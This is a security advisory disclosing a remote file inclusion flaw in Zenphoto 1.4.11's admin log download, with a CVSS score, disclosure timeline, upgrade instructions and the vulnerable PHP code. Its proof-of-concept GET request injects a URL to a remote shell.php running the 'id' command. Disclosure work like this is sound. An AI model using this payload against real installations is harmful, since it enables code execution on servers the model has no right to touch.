Zenphoto 1.4.11 - Remote File Inclusion Vulnerability

Zenphoto 1.4.11 - Remote File Inclusion Vulnerability
 
1. Introduction
 
Affected Product:   Zenphoto 1.4.11
Fixed in:           1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
                    zenphoto-1.4.12.zip
Vendor Website:     http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to        03/15/2016
public:
Release mode:       Coordinated Release
CVE:                n/a
Credits             Tim Coen of Curesec GmbH
 
2. Overview
 
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.
 
3. Details
 
Description
 
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
 
When downloading a log file, the input is not properly sanitized, leading to
RFI.
 
An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.
 
In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.
 
Proof of Concept
 
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
 
Code
 
// admin-logs.php (sanitize(x, 3) only strips out tags)
    case 'download_log':
            $zipname = sanitize($_GET['tab'], 3) . '.zip';
            if (class_exists('ZipArchive')) {
                    $zip = new ZipArchive;
                    $zip->open($zipname, ZipArchive::CREATE);
                    $zip->addFile($file, basename($file));
                    $zip->close();
                    ob_get_clean();
                    header("Pragma: public");
                    header("Expires: 0");
                    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
                    header("Cache-Control: private", false);
                    header("Content-Type: application/zip");
                    header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
                    header("Content-Transfer-Encoding: binary");
                    header("Content-Length: " . filesize($zipname));
                    readfile($zipname);
                    // remove zip file from temp path
                    unlink($zipname);
                    exit;
            } else {
                    include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
                    $zip = new ZipStream($zipname);
                    $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
                    $zip->finish();
            }
            break;
 
4. Solution
 
To mitigate this issue please upgrade at least to version 1.4.12:
 
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
 
Please note that a newer version might already be available.
 
5. Report Timeline
 
01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public
 
 
Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
  
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec